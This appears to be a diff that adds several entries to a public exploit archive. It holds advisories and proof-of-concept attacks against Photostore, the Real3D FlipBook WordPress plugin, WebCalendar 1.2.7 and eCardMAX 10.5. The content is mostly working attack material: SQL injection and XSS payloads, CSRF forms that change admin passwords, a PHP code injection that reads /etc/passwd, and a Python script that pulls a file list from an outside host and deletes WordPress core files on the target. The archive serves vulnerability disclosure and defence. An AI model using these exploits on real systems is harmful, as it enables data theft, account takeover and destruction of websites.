# The vulnerabilities which are described bellow does not require any legitimate user to exploit them.
# The Photostore application is prone to a multiple vulnerabilities such as SQL Injection & Cross Site Scripting and does not require any legitimate user or admin privilege to exploit them.
# A potentially attacker can exploit those vulnerabilities to retrieve all the data stored in the application's database (In case of SQL Injection vulnerability), Cookie Stealing / Phishing attacks (In case of Cross site scripting vulnerability).
# SQL Injection (error based) Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# SQL Injection (Severity is Critical)
# The vulnerable parameter is “gallerySortType” which is not sanitized and sent by the user in order retrieve the gallery objects ordered by ASC or DESC in sql query.
# Request Data #1 is:
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: www.ktoolsdemos.net
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
###
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
###
# The vulnerable parameter is “gallerySortBy” which is not sanitized and sent by the user in order retrieve the gallery objects selected by kind-of-type in sql query.
# Request Data #2 is:
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://server/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: server
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc
# Cross Site Scripting Proof—Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# XSS (Severity is Medium)
# The vulnerable parameter is “mediaID” in “workbox.php” file and the parameter “password” in “/mgr.login.php” file which is not sanitized and sent by the user to the application
#
# In Order to exploit this vulnerability, the URL should be like the following examples:
#
# http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“><script>alert(/XSS/)</script>
# http://server/photostore/manager/mgr.login.php?username=demo&password='><script>alert("XSS")</script><input type='hidden
# Full path disclosure Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# FPD (Severity is low/info)
# The vulnerable parameter is “photoID” in “productshot.php” file which is partially sanitized and therefor an attacker could exploit this only to full path disclosure.
#
# In order to exploit this vulnerability, the url should be like the following example:
#
# http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125

98
platforms/php/webapps/40055.py Executable file
View file

@ -0,0 +1,98 @@
#########################################################################
# [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin
# [+] http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587
# [+] Multiple Vulnerabilities Found by: Mukarram Khalid
# [+] https://mukarramkhalid.com/wordpress-real-3d-flipbook-plugin-exploit/
# [+] Requirements : Python 3.4.x or higher, Requests Module
# [+] Timeline: Vuln Found : 01-07-2016, Reported to Vendor: 03-07-2016
########################################################################
import os, json, base64
try:
import requests
except:
exit('[-] Importing Requests module failed')
class wpFlipbook:
''' Wordpress 3d flipbook plugin exploit '''
headers = {'User-agent' : 'Mozilla/11.0'}
payload1 = {'deleteBook' : ''}
payload2 = {'imgbase' : '', 'bookName' : '../../../', 'pageName' : 'makman'}
payload3 = {'action' : 'delete', 'bookId' : '<script>alert(/makman/)</script>'}
imageUrl = 'http://makman.tk/makman.jpg'
wpFilesUrl = 'http://makman.tk/wpFiles.json'
def __init__(self, url):
url = url.rstrip('/')
if 'http://' in url or 'https://' in url:
self.url = url
else:
self.url = 'http://' + url
def http(self, url, data = {}, post = False):
try:
if post:
r = requests.post(url, data = data, headers = self.headers, timeout = 20)
else:
r = requests.get(url, params = data, headers = self.headers, timeout = 20)
except:
exit('[-] Something went wrong. Please check your internet connection')
return r
def deleteFiles(self):
print('[+] Loading Wordpress file structure')
r = self.http(self.wpFilesUrl)
wpFiles = json.loads(r.text)
print('[+] Wordpress File structure loaded successfully')
print('[+] Creating directory real3dflipbook')
r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True)
print('[+] Deleting Files from wp-includes/ & wp-admin/')
for wpFile in wpFiles['wpFiles']:
print(' [+] Deleting File ' + wpFile)
self.payload1['deleteBook'] = wpFile
r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)
print('[+] Files have been deleted successfully')
def uploadImage(self):
print('[+] Loading image file')
r = self.http('http://makman.tk/makman.jpg')
encodedImage = base64.b64encode(r.content)
self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8')
print('[+] Uploading image file in target root directory')
r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)
print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg')
def xss(self):
print('[+] Checking XSS payload')
r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)
if self.payload3['bookId'] in r.text:
print('[+] Found XSS here :')
print(' [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId'])
#########################################################################################################
def banner():
os.system('cls' if os.name == 'nt' else 'clear')
tabs = ' '
print(tabs + '*******************************************************************')
print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin *')
print(tabs + '* [+] Multiple Vulnerabilities Found by: *')
print(tabs + '* [+] https://mukarramkhalid.com *')
print(tabs + '*******************************************************************\n\n')
def main():
banner()
url = input('[+] Enter Url\n[+] E.g. http://server or http://server/wordpress\n[+] ')
exploit = wpFlipbook(url)
exploit.deleteFiles()
exploit.uploadImage()
exploit.xss()
print('[+] Done')
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit('\n[-] CTRL-C detected.\n')
# End

269
platforms/php/webapps/40057.txt Executable file
View file

@ -0,0 +1,269 @@
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==========================
www.k5n.us/webcalendar.php
Product:
==================
WebCalendar v1.2.7
WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
Interbase, MS SQL Server, or ODBC is required.
WebCalendar can be setup in a variety of ways, such as...
A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new
events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.
Vulnerability Type:
======================
CSRF PROTECTION BYPASS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
WebCalendar attempts to uses the HTTP Referer to check that requests are
originating from same server as we see below.
From WebCalendar "include/functions.php" file on line 6117:
////////////////////////////////////////////////////////////
function require_valide_referring_url ()
{
global $SERVER_URL;
if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
// Missing the REFERER value
//die_miserable_death ( translate ( 'Invalid referring URL' ) );
// Unfortunately, some version of MSIE do not send this info.
return true;
}
if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
// Gotcha. URL of referring page is not the same as our server.
// This can be an instance of XSRF.
// (This may also happen when more than address is used for your server.
// However, you're not supposed to do that with this version of
// WebCalendar anyhow...)
die_miserable_death ( translate ( 'Invalid referring URL' ) );
}
}
/////////////////////////////////////////////////////////////////////////////////////////
However, this can be easily defeated by just not sending a referer. HTML 5
includes a handy tag <meta name="referrer" content="none"> to omit the
referer
when making an HTTP request, currently supported in Chrome, Safari,
MobileSafari and other WebKit-based browsers. Using this meta tag we send
no referrer
and the vulnerable application will then happily process our CSRF requests.
Exploit code(s):
===============
1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
victim user is required for success.
<meta name="referrer" content="none">
<form id="CSRF" action="
http://localhost/WebCalendar-1.2.7/edit_user_handler.php" method="post">
<input type="hidden" name="formtype" value="setpassword" />
<input type="hidden" name="user" value="admin" />
<input name="upassword1" id="newpass1" type="password" value="1234567" />
<input name="upassword2" id="newpass2" type="password" value="1234567" />
</form>
2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"
<meta name="referrer" content="none">
<form id="CSRF_ACCESS_CTRL" action="
http://localhost/WebCalendar-1.2.7/admin.php" method="post"
name="prefform"><br />
<input type="hidden" name="currenttab" id="currenttab" value="settings" />
<input type="submit" value="Save" name="" />
<input type="hidden" name="admin_PUBLIC_ACCESS" value="Y" />
<script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script>
</form>
#######################################################
Vulnerability Type:
======================
PHP Code Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Since WebCalendars install script is not removed after installation as
there is no "automatic" removal of it, low privileged users can inject
arbitrary
PHP code for the "Database Cache" directory value as no input validation
exists for this when a user installs the application using the WebCalendar
walk
thru wizard.
If WebCalendars installation script is available as part of a default
image, often as a convenience by some hosting providers, this can be used
to gain
code execution on the target system. The only item that is required is the
user must have privileges to authenticate to the MySQL Database and to run
the
install script. So, users who have install wizard access for the
WebCalendar application will now have ability to launch arbitrary system
commands on the
affected host.
One problem we must overcome is WebCalendar filters quotes " so we cannot
use code like <?php echo "/bin/cat /etc/passwd"; ?> However, we can defeat
this
obstacle using the all to forgotten backtick `CMD` operator!.
e.g.
*/?><?php echo `/bin/cat /etc/passwd`; ?>
This results in "settings.php" being injected like...
<?php
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400
install_password: e99a18c428cb38d5f260853678922e03
db_type: mysql
db_host: localhost
db_database: intranet
db_login: admin
db_password: abc123
db_persistent: false
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>
readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>
Exploitation steps(s):
=====================
1) Login to the WebCalendar Installation Wizard.
2) When you get to WebCalendar Installation Wizard Step 2 of the install
script.
http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2
3) Click "Test Settings" button to ensure connection to the Database.
4) Enter below PHP code for the "Database Cache Directory:" input fields
value to pop calculator for POC (Windows).
*/?><?php exec(`calc.exe`); ?>
5) Click "Next" button
6) Click "Next" button
7) Click "Save settings" button
BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.
If you happen to get following error when clicking "Test Settings" button,
"Failure Reason: Database Cache Directory does not exist", just click back
button then forward or just "Test settings" button again to try get past
the error.
Disclosure Timeline:
===============================
Vendor Notification: No replies
July 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX

98
platforms/php/webapps/40058.txt Executable file
View file

@ -0,0 +1,98 @@
eCardMAX 10.5 SQL Injection and XSS Vulnerabilities
[Software]
- eCardMAX 10.5
[Vendor]
- eCardMAX.COM - http://www.ecardmax.com/
[Vendor Product Description]
- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your
own ecard website with many of the advanced features found on other major sites. Starting your own ecard website
with eCardMax is fast and easy.
[Advisory Timeline]
- 13/06/2016 -> Vulnerability discovered;
- 13/06/2016 -> First contact with vendor;
- 13/06/2016 -> Vendor responds asking for details;
- 14/06/2016 -> Vulnerability details sent to the vendor;
- 17/06/2016 -> Vendor working on a patch;
- 28/06/2016 -> Vendor Releases Patch
- 01/07/2016 -> Public Security Advisory Published
[Bug Summary]
- SQL Injection
- Cross Site Scripting (Reflected)
[Impact]
- High
[Affected Version]
- v10.5
[Tested on]
- Apache/2.2.26
- PHP/5.3.28
- MySQL/5.5.49-cll
[Bug Description and Proof of Concept]
- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters
is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
[Proof-of-Concept]
1. SQL Injection:
Parameter: row_number (GET)
POC URL:
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Cross Site Scripting (Reflected):
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User
Parameter(s): keyword (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
Parameter(s): page (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2
Parameter(s): row_number (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Parameter(s): keyword (GET)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"